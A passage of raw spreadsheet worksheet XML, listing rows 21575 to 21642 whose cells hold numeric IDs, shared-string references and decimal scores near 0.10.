      <c r="B21575" s="2">
        <v>3.8312997E7</v>
      </c>
      <c r="C21575" s="2" t="s">
        <v>20827</v>
      </c>
      <c r="D21575" s="2">
        <v>1.0</v>
      </c>
      <c r="E21575" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21575" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21576" ht="15.75" customHeight="1">
      <c r="A21576" s="1">
        <v>17751.0</v>
      </c>
      <c r="B21576" s="2">
        <v>5.0683713E7</v>
      </c>
      <c r="C21576" s="2" t="s">
        <v>20828</v>
      </c>
      <c r="D21576" s="2">
        <v>1.0</v>
      </c>
      <c r="E21576" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21576" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21577" ht="15.75" customHeight="1">
      <c r="A21577" s="1">
        <v>19007.0</v>
      </c>
      <c r="B21577" s="2">
        <v>5.4488301E7</v>
      </c>
      <c r="C21577" s="2" t="s">
        <v>20829</v>
      </c>
      <c r="D21577" s="2">
        <v>1.0</v>
      </c>
      <c r="E21577" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21577" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21578" ht="15.75" customHeight="1">
      <c r="A21578" s="1">
        <v>19761.0</v>
      </c>
      <c r="B21578" s="2">
        <v>5.6735527E7</v>
      </c>
      <c r="C21578" s="2" t="s">
        <v>20830</v>
      </c>
      <c r="D21578" s="2">
        <v>1.0</v>
      </c>
      <c r="E21578" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21578" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21579" ht="15.75" customHeight="1">
      <c r="A21579" s="1">
        <v>28504.0</v>
      </c>
      <c r="B21579" s="2">
        <v>2.6708797E7</v>
      </c>
      <c r="C21579" s="2" t="s">
        <v>20831</v>
      </c>
      <c r="D21579" s="2">
        <v>1.0</v>
      </c>
      <c r="E21579" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21579" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21580" ht="15.75" customHeight="1">
      <c r="A21580" s="1">
        <v>30086.0</v>
      </c>
      <c r="B21580" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C21580" s="2" t="s">
        <v>20832</v>
      </c>
      <c r="D21580" s="2">
        <v>1.0</v>
      </c>
      <c r="E21580" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21580" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="21581" ht="15.75" customHeight="1">
      <c r="A21581" s="1">
        <v>3181.0</v>
      </c>
      <c r="B21581" s="2">
        <v>3.7103756E7</v>
      </c>
      <c r="C21581" s="2" t="s">
        <v>20833</v>
      </c>
      <c r="D21581" s="2">
        <v>1.0</v>
      </c>
      <c r="E21581" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21581" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="21582" ht="15.75" customHeight="1">
      <c r="A21582" s="1">
        <v>11772.0</v>
      </c>
      <c r="B21582" s="2">
        <v>2.4248572E7</v>
      </c>
      <c r="C21582" s="2" t="s">
        <v>20834</v>
      </c>
      <c r="D21582" s="2">
        <v>1.0</v>
      </c>
      <c r="E21582" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21582" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="21583" ht="15.75" customHeight="1">
      <c r="A21583" s="1">
        <v>12815.0</v>
      </c>
      <c r="B21583" s="2">
        <v>3.1577918E7</v>
      </c>
      <c r="C21583" s="2" t="s">
        <v>20835</v>
      </c>
      <c r="D21583" s="2">
        <v>1.0</v>
      </c>
      <c r="E21583" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21583" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="21584" ht="15.75" customHeight="1">
      <c r="A21584" s="1">
        <v>14171.0</v>
      </c>
      <c r="B21584" s="2">
        <v>3.8051461E7</v>
      </c>
      <c r="C21584" s="2" t="s">
        <v>20836</v>
      </c>
      <c r="D21584" s="2">
        <v>1.0</v>
      </c>
      <c r="E21584" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21584" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="21585" ht="15.75" customHeight="1">
      <c r="A21585" s="1">
        <v>30243.0</v>
      </c>
      <c r="B21585" s="2">
        <v>3.7543062E7</v>
      </c>
      <c r="C21585" s="2" t="s">
        <v>20837</v>
      </c>
      <c r="D21585" s="2">
        <v>1.0</v>
      </c>
      <c r="E21585" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21585" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="21586" ht="15.75" customHeight="1">
      <c r="A21586" s="1">
        <v>33496.0</v>
      </c>
      <c r="B21586" s="2">
        <v>8044901.0</v>
      </c>
      <c r="C21586" s="2" t="s">
        <v>20776</v>
      </c>
      <c r="D21586" s="2">
        <v>1.0</v>
      </c>
      <c r="E21586" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21586" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="21587" ht="15.75" customHeight="1">
      <c r="A21587" s="1">
        <v>627.0</v>
      </c>
      <c r="B21587" s="2">
        <v>1.9631538E7</v>
      </c>
      <c r="C21587" s="2" t="s">
        <v>20838</v>
      </c>
      <c r="D21587" s="2">
        <v>1.0</v>
      </c>
      <c r="E21587" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21587" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="21588" ht="15.75" customHeight="1">
      <c r="A21588" s="1">
        <v>1599.0</v>
      </c>
      <c r="B21588" s="2">
        <v>2.7788354E7</v>
      </c>
      <c r="C21588" s="2" t="s">
        <v>20839</v>
      </c>
      <c r="D21588" s="2">
        <v>1.0</v>
      </c>
      <c r="E21588" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21588" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="21589" ht="15.75" customHeight="1">
      <c r="A21589" s="1">
        <v>4322.0</v>
      </c>
      <c r="B21589" s="2">
        <v>4.2038806E7</v>
      </c>
      <c r="C21589" s="2" t="s">
        <v>20840</v>
      </c>
      <c r="D21589" s="2">
        <v>1.0</v>
      </c>
      <c r="E21589" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21589" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="21590" ht="15.75" customHeight="1">
      <c r="A21590" s="1">
        <v>14753.0</v>
      </c>
      <c r="B21590" s="2">
        <v>4.0793969E7</v>
      </c>
      <c r="C21590" s="2" t="s">
        <v>20841</v>
      </c>
      <c r="D21590" s="2">
        <v>1.0</v>
      </c>
      <c r="E21590" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21590" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="21591" ht="15.75" customHeight="1">
      <c r="A21591" s="1">
        <v>17340.0</v>
      </c>
      <c r="B21591" s="2">
        <v>4.9395171E7</v>
      </c>
      <c r="C21591" s="2" t="s">
        <v>20842</v>
      </c>
      <c r="D21591" s="2">
        <v>1.0</v>
      </c>
      <c r="E21591" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21591" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="21592" ht="15.75" customHeight="1">
      <c r="A21592" s="1">
        <v>23959.0</v>
      </c>
      <c r="B21592" s="2">
        <v>9006361.0</v>
      </c>
      <c r="C21592" s="2" t="s">
        <v>20843</v>
      </c>
      <c r="D21592" s="2">
        <v>1.0</v>
      </c>
      <c r="E21592" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21592" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="21593" ht="15.75" customHeight="1">
      <c r="A21593" s="1">
        <v>2712.0</v>
      </c>
      <c r="B21593" s="2">
        <v>3.4885432E7</v>
      </c>
      <c r="C21593" s="2" t="s">
        <v>20844</v>
      </c>
      <c r="D21593" s="2">
        <v>1.0</v>
      </c>
      <c r="E21593" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21593" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="21594" ht="15.75" customHeight="1">
      <c r="A21594" s="1">
        <v>5206.0</v>
      </c>
      <c r="B21594" s="2">
        <v>4.490999E7</v>
      </c>
      <c r="C21594" s="2" t="s">
        <v>20845</v>
      </c>
      <c r="D21594" s="2">
        <v>1.0</v>
      </c>
      <c r="E21594" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21594" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="21595" ht="15.75" customHeight="1">
      <c r="A21595" s="1">
        <v>7438.0</v>
      </c>
      <c r="B21595" s="2">
        <v>5.1213216E7</v>
      </c>
      <c r="C21595" s="2" t="s">
        <v>20846</v>
      </c>
      <c r="D21595" s="2">
        <v>1.0</v>
      </c>
      <c r="E21595" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21595" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="21596" ht="15.75" customHeight="1">
      <c r="A21596" s="1">
        <v>8548.0</v>
      </c>
      <c r="B21596" s="2">
        <v>5.4142718E7</v>
      </c>
      <c r="C21596" s="2" t="s">
        <v>20847</v>
      </c>
      <c r="D21596" s="2">
        <v>1.0</v>
      </c>
      <c r="E21596" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21596" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="21597" ht="15.75" customHeight="1">
      <c r="A21597" s="1">
        <v>13700.0</v>
      </c>
      <c r="B21597" s="2">
        <v>3.6163014E7</v>
      </c>
      <c r="C21597" s="2" t="s">
        <v>20848</v>
      </c>
      <c r="D21597" s="2">
        <v>1.0</v>
      </c>
      <c r="E21597" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21597" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="21598" ht="15.75" customHeight="1">
      <c r="A21598" s="1">
        <v>15896.0</v>
      </c>
      <c r="B21598" s="2">
        <v>4.4574801E7</v>
      </c>
      <c r="C21598" s="2" t="s">
        <v>20849</v>
      </c>
      <c r="D21598" s="2">
        <v>1.0</v>
      </c>
      <c r="E21598" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21598" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="21599" ht="15.75" customHeight="1">
      <c r="A21599" s="1">
        <v>5679.0</v>
      </c>
      <c r="B21599" s="2">
        <v>4.6389046E7</v>
      </c>
      <c r="C21599" s="2" t="s">
        <v>20850</v>
      </c>
      <c r="D21599" s="2">
        <v>1.0</v>
      </c>
      <c r="E21599" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21599" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="21600" ht="15.75" customHeight="1">
      <c r="A21600" s="1">
        <v>7667.0</v>
      </c>
      <c r="B21600" s="2">
        <v>5.1884314E7</v>
      </c>
      <c r="C21600" s="2" t="s">
        <v>20851</v>
      </c>
      <c r="D21600" s="2">
        <v>1.0</v>
      </c>
      <c r="E21600" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21600" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="21601" ht="15.75" customHeight="1">
      <c r="A21601" s="1">
        <v>10102.0</v>
      </c>
      <c r="B21601" s="2">
        <v>5.7221914E7</v>
      </c>
      <c r="C21601" s="2" t="s">
        <v>20852</v>
      </c>
      <c r="D21601" s="2">
        <v>1.0</v>
      </c>
      <c r="E21601" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21601" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="21602" ht="15.75" customHeight="1">
      <c r="A21602" s="1">
        <v>10229.0</v>
      </c>
      <c r="B21602" s="2">
        <v>5.7482674E7</v>
      </c>
      <c r="C21602" s="2" t="s">
        <v>20853</v>
      </c>
      <c r="D21602" s="2">
        <v>1.0</v>
      </c>
      <c r="E21602" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21602" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="21603" ht="15.75" customHeight="1">
      <c r="A21603" s="1">
        <v>14717.0</v>
      </c>
      <c r="B21603" s="2">
        <v>4.063349E7</v>
      </c>
      <c r="C21603" s="2" t="s">
        <v>20854</v>
      </c>
      <c r="D21603" s="2">
        <v>1.0</v>
      </c>
      <c r="E21603" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21603" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="21604" ht="15.75" customHeight="1">
      <c r="A21604" s="1">
        <v>19587.0</v>
      </c>
      <c r="B21604" s="2">
        <v>5.6158796E7</v>
      </c>
      <c r="C21604" s="2" t="s">
        <v>20855</v>
      </c>
      <c r="D21604" s="2">
        <v>1.0</v>
      </c>
      <c r="E21604" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21604" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="21605" ht="15.75" customHeight="1">
      <c r="A21605" s="1">
        <v>5215.0</v>
      </c>
      <c r="B21605" s="2">
        <v>4.4940143E7</v>
      </c>
      <c r="C21605" s="2" t="s">
        <v>20856</v>
      </c>
      <c r="D21605" s="2">
        <v>1.0</v>
      </c>
      <c r="E21605" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21605" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="21606" ht="15.75" customHeight="1">
      <c r="A21606" s="1">
        <v>14981.0</v>
      </c>
      <c r="B21606" s="2">
        <v>4.1383703E7</v>
      </c>
      <c r="C21606" s="2" t="s">
        <v>20857</v>
      </c>
      <c r="D21606" s="2">
        <v>1.0</v>
      </c>
      <c r="E21606" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21606" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="21607" ht="15.75" customHeight="1">
      <c r="A21607" s="1">
        <v>30456.0</v>
      </c>
      <c r="B21607" s="2">
        <v>3.9462503E7</v>
      </c>
      <c r="C21607" s="2" t="s">
        <v>20858</v>
      </c>
      <c r="D21607" s="2">
        <v>1.0</v>
      </c>
      <c r="E21607" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21607" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="21608" ht="15.75" customHeight="1">
      <c r="A21608" s="1">
        <v>2636.0</v>
      </c>
      <c r="B21608" s="2">
        <v>3.4595073E7</v>
      </c>
      <c r="C21608" s="2" t="s">
        <v>20859</v>
      </c>
      <c r="D21608" s="2">
        <v>1.0</v>
      </c>
      <c r="E21608" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21608" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="21609" ht="15.75" customHeight="1">
      <c r="A21609" s="1">
        <v>7471.0</v>
      </c>
      <c r="B21609" s="2">
        <v>5.1282129E7</v>
      </c>
      <c r="C21609" s="2" t="s">
        <v>20860</v>
      </c>
      <c r="D21609" s="2">
        <v>1.0</v>
      </c>
      <c r="E21609" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21609" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="21610" ht="15.75" customHeight="1">
      <c r="A21610" s="1">
        <v>14546.0</v>
      </c>
      <c r="B21610" s="2">
        <v>3.9937989E7</v>
      </c>
      <c r="C21610" s="2" t="s">
        <v>20861</v>
      </c>
      <c r="D21610" s="2">
        <v>1.0</v>
      </c>
      <c r="E21610" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21610" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="21611" ht="15.75" customHeight="1">
      <c r="A21611" s="1">
        <v>14817.0</v>
      </c>
      <c r="B21611" s="2">
        <v>4.0958096E7</v>
      </c>
      <c r="C21611" s="2" t="s">
        <v>20862</v>
      </c>
      <c r="D21611" s="2">
        <v>1.0</v>
      </c>
      <c r="E21611" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21611" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="21612" ht="15.75" customHeight="1">
      <c r="A21612" s="1">
        <v>97.0</v>
      </c>
      <c r="B21612" s="2">
        <v>1.2414912E7</v>
      </c>
      <c r="C21612" s="2" t="s">
        <v>20863</v>
      </c>
      <c r="D21612" s="2">
        <v>1.0</v>
      </c>
      <c r="E21612" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21612" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21613" ht="15.75" customHeight="1">
      <c r="A21613" s="1">
        <v>116.0</v>
      </c>
      <c r="B21613" s="2">
        <v>1.2975575E7</v>
      </c>
      <c r="C21613" s="2" t="s">
        <v>20864</v>
      </c>
      <c r="D21613" s="2">
        <v>1.0</v>
      </c>
      <c r="E21613" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21613" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21614" ht="15.75" customHeight="1">
      <c r="A21614" s="1">
        <v>196.0</v>
      </c>
      <c r="B21614" s="2">
        <v>1.4430233E7</v>
      </c>
      <c r="C21614" s="2" t="s">
        <v>20865</v>
      </c>
      <c r="D21614" s="2">
        <v>1.0</v>
      </c>
      <c r="E21614" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21614" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21615" ht="15.75" customHeight="1">
      <c r="A21615" s="1">
        <v>281.0</v>
      </c>
      <c r="B21615" s="2">
        <v>1.5360688E7</v>
      </c>
      <c r="C21615" s="2" t="s">
        <v>20866</v>
      </c>
      <c r="D21615" s="2">
        <v>1.0</v>
      </c>
      <c r="E21615" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21615" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21616" ht="15.75" customHeight="1">
      <c r="A21616" s="1">
        <v>282.0</v>
      </c>
      <c r="B21616" s="2">
        <v>1.5360688E7</v>
      </c>
      <c r="C21616" s="2" t="s">
        <v>20867</v>
      </c>
      <c r="D21616" s="2">
        <v>1.0</v>
      </c>
      <c r="E21616" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21616" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21617" ht="15.75" customHeight="1">
      <c r="A21617" s="1">
        <v>567.0</v>
      </c>
      <c r="B21617" s="2">
        <v>1.8994367E7</v>
      </c>
      <c r="C21617" s="2" t="s">
        <v>20868</v>
      </c>
      <c r="D21617" s="2">
        <v>1.0</v>
      </c>
      <c r="E21617" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21617" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21618" ht="15.75" customHeight="1">
      <c r="A21618" s="1">
        <v>750.0</v>
      </c>
      <c r="B21618" s="2">
        <v>2.0934843E7</v>
      </c>
      <c r="C21618" s="2" t="s">
        <v>20869</v>
      </c>
      <c r="D21618" s="2">
        <v>1.0</v>
      </c>
      <c r="E21618" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21618" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21619" ht="15.75" customHeight="1">
      <c r="A21619" s="1">
        <v>781.0</v>
      </c>
      <c r="B21619" s="2">
        <v>2.1121772E7</v>
      </c>
      <c r="C21619" s="2" t="s">
        <v>20870</v>
      </c>
      <c r="D21619" s="2">
        <v>1.0</v>
      </c>
      <c r="E21619" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21619" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21620" ht="15.75" customHeight="1">
      <c r="A21620" s="1">
        <v>902.0</v>
      </c>
      <c r="B21620" s="2">
        <v>2.2124293E7</v>
      </c>
      <c r="C21620" s="2" t="s">
        <v>20871</v>
      </c>
      <c r="D21620" s="2">
        <v>1.0</v>
      </c>
      <c r="E21620" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21620" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21621" ht="15.75" customHeight="1">
      <c r="A21621" s="1">
        <v>1070.0</v>
      </c>
      <c r="B21621" s="2">
        <v>2.3538522E7</v>
      </c>
      <c r="C21621" s="2" t="s">
        <v>20872</v>
      </c>
      <c r="D21621" s="2">
        <v>1.0</v>
      </c>
      <c r="E21621" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21621" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21622" ht="15.75" customHeight="1">
      <c r="A21622" s="1">
        <v>1096.0</v>
      </c>
      <c r="B21622" s="2">
        <v>2.3783544E7</v>
      </c>
      <c r="C21622" s="2" t="s">
        <v>20873</v>
      </c>
      <c r="D21622" s="2">
        <v>1.0</v>
      </c>
      <c r="E21622" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21622" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21623" ht="15.75" customHeight="1">
      <c r="A21623" s="1">
        <v>1121.0</v>
      </c>
      <c r="B21623" s="2">
        <v>2.4142044E7</v>
      </c>
      <c r="C21623" s="2" t="s">
        <v>20874</v>
      </c>
      <c r="D21623" s="2">
        <v>1.0</v>
      </c>
      <c r="E21623" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21623" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21624" ht="15.75" customHeight="1">
      <c r="A21624" s="1">
        <v>1481.0</v>
      </c>
      <c r="B21624" s="2">
        <v>2.7143692E7</v>
      </c>
      <c r="C21624" s="2" t="s">
        <v>20875</v>
      </c>
      <c r="D21624" s="2">
        <v>1.0</v>
      </c>
      <c r="E21624" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21624" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21625" ht="15.75" customHeight="1">
      <c r="A21625" s="1">
        <v>1504.0</v>
      </c>
      <c r="B21625" s="2">
        <v>2.7280585E7</v>
      </c>
      <c r="C21625" s="2" t="s">
        <v>20876</v>
      </c>
      <c r="D21625" s="2">
        <v>1.0</v>
      </c>
      <c r="E21625" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21625" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21626" ht="15.75" customHeight="1">
      <c r="A21626" s="1">
        <v>1703.0</v>
      </c>
      <c r="B21626" s="2">
        <v>2.8561048E7</v>
      </c>
      <c r="C21626" s="2" t="s">
        <v>20877</v>
      </c>
      <c r="D21626" s="2">
        <v>1.0</v>
      </c>
      <c r="E21626" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21626" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21627" ht="15.75" customHeight="1">
      <c r="A21627" s="1">
        <v>1728.0</v>
      </c>
      <c r="B21627" s="2">
        <v>2.8731155E7</v>
      </c>
      <c r="C21627" s="2" t="s">
        <v>20878</v>
      </c>
      <c r="D21627" s="2">
        <v>1.0</v>
      </c>
      <c r="E21627" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21627" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21628" ht="15.75" customHeight="1">
      <c r="A21628" s="1">
        <v>1987.0</v>
      </c>
      <c r="B21628" s="2">
        <v>3.0490947E7</v>
      </c>
      <c r="C21628" s="2" t="s">
        <v>20879</v>
      </c>
      <c r="D21628" s="2">
        <v>1.0</v>
      </c>
      <c r="E21628" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21628" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21629" ht="15.75" customHeight="1">
      <c r="A21629" s="1">
        <v>2089.0</v>
      </c>
      <c r="B21629" s="2">
        <v>3.1259876E7</v>
      </c>
      <c r="C21629" s="2" t="s">
        <v>20880</v>
      </c>
      <c r="D21629" s="2">
        <v>1.0</v>
      </c>
      <c r="E21629" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21629" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21630" ht="15.75" customHeight="1">
      <c r="A21630" s="1">
        <v>2181.0</v>
      </c>
      <c r="B21630" s="2">
        <v>3.1832454E7</v>
      </c>
      <c r="C21630" s="2" t="s">
        <v>20881</v>
      </c>
      <c r="D21630" s="2">
        <v>1.0</v>
      </c>
      <c r="E21630" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21630" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21631" ht="15.75" customHeight="1">
      <c r="A21631" s="1">
        <v>2326.0</v>
      </c>
      <c r="B21631" s="2">
        <v>3.2925541E7</v>
      </c>
      <c r="C21631" s="2" t="s">
        <v>20882</v>
      </c>
      <c r="D21631" s="2">
        <v>1.0</v>
      </c>
      <c r="E21631" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21631" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21632" ht="15.75" customHeight="1">
      <c r="A21632" s="1">
        <v>2878.0</v>
      </c>
      <c r="B21632" s="2">
        <v>3.5656864E7</v>
      </c>
      <c r="C21632" s="2" t="s">
        <v>20883</v>
      </c>
      <c r="D21632" s="2">
        <v>1.0</v>
      </c>
      <c r="E21632" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21632" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21633" ht="15.75" customHeight="1">
      <c r="A21633" s="1">
        <v>3207.0</v>
      </c>
      <c r="B21633" s="2">
        <v>3.7283736E7</v>
      </c>
      <c r="C21633" s="2" t="s">
        <v>20884</v>
      </c>
      <c r="D21633" s="2">
        <v>1.0</v>
      </c>
      <c r="E21633" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21633" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21634" ht="15.75" customHeight="1">
      <c r="A21634" s="1">
        <v>3358.0</v>
      </c>
      <c r="B21634" s="2">
        <v>3.7842436E7</v>
      </c>
      <c r="C21634" s="2" t="s">
        <v>20885</v>
      </c>
      <c r="D21634" s="2">
        <v>1.0</v>
      </c>
      <c r="E21634" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21634" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21635" ht="15.75" customHeight="1">
      <c r="A21635" s="1">
        <v>3420.0</v>
      </c>
      <c r="B21635" s="2">
        <v>3.8145266E7</v>
      </c>
      <c r="C21635" s="2" t="s">
        <v>20886</v>
      </c>
      <c r="D21635" s="2">
        <v>1.0</v>
      </c>
      <c r="E21635" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21635" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21636" ht="15.75" customHeight="1">
      <c r="A21636" s="1">
        <v>3616.0</v>
      </c>
      <c r="B21636" s="2">
        <v>3.9175013E7</v>
      </c>
      <c r="C21636" s="2" t="s">
        <v>20887</v>
      </c>
      <c r="D21636" s="2">
        <v>1.0</v>
      </c>
      <c r="E21636" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21636" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21637" ht="15.75" customHeight="1">
      <c r="A21637" s="1">
        <v>3648.0</v>
      </c>
      <c r="B21637" s="2">
        <v>3.9289428E7</v>
      </c>
      <c r="C21637" s="2" t="s">
        <v>20888</v>
      </c>
      <c r="D21637" s="2">
        <v>1.0</v>
      </c>
      <c r="E21637" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21637" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21638" ht="15.75" customHeight="1">
      <c r="A21638" s="1">
        <v>3650.0</v>
      </c>
      <c r="B21638" s="2">
        <v>3.9306177E7</v>
      </c>
      <c r="C21638" s="2" t="s">
        <v>20889</v>
      </c>
      <c r="D21638" s="2">
        <v>1.0</v>
      </c>
      <c r="E21638" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21638" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21639" ht="15.75" customHeight="1">
      <c r="A21639" s="1">
        <v>3655.0</v>
      </c>
      <c r="B21639" s="2">
        <v>3.9318481E7</v>
      </c>
      <c r="C21639" s="2" t="s">
        <v>20890</v>
      </c>
      <c r="D21639" s="2">
        <v>1.0</v>
      </c>
      <c r="E21639" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21639" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21640" ht="15.75" customHeight="1">
      <c r="A21640" s="1">
        <v>3985.0</v>
      </c>
      <c r="B21640" s="2">
        <v>4.0845799E7</v>
      </c>
      <c r="C21640" s="2" t="s">
        <v>20891</v>
      </c>
      <c r="D21640" s="2">
        <v>1.0</v>
      </c>
      <c r="E21640" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21640" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21641" ht="15.75" customHeight="1">
      <c r="A21641" s="1">
        <v>4010.0</v>
      </c>
      <c r="B21641" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C21641" s="2" t="s">
        <v>20892</v>
      </c>
      <c r="D21641" s="2">
        <v>1.0</v>
      </c>
      <c r="E21641" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21641" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="21642" ht="15.75" customHeight="1">
      <c r="A21642" s="1">
        <v>4146.0</v>
      </c>
      <c r="B21642" s="2">
